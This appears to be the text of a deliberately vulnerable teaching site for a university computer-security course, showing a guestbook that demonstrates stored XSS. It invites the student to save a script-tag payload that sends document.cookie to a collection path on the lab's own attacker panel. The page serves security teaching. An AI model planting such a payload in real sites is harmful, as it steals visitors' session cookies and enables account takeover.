Panel de la demostración - sitio intencionalmente vulnerable con fines educativos (Unidad 4, Seguridad Informática - UNPAZ)
Centro de control MODO: VULNERABLE

Libro de visitas

XSS almacenado: lo que se guarda acá lo ven todos los que entran. Si el payload se guarda sin sanitizar, ataca a cada visitante.

VULNERABLE: probá guardar <script>new Image().src='/c/TU_TOKEN?c='+document.cookie</script> (tu token está en el panel de atacante).

Comentarios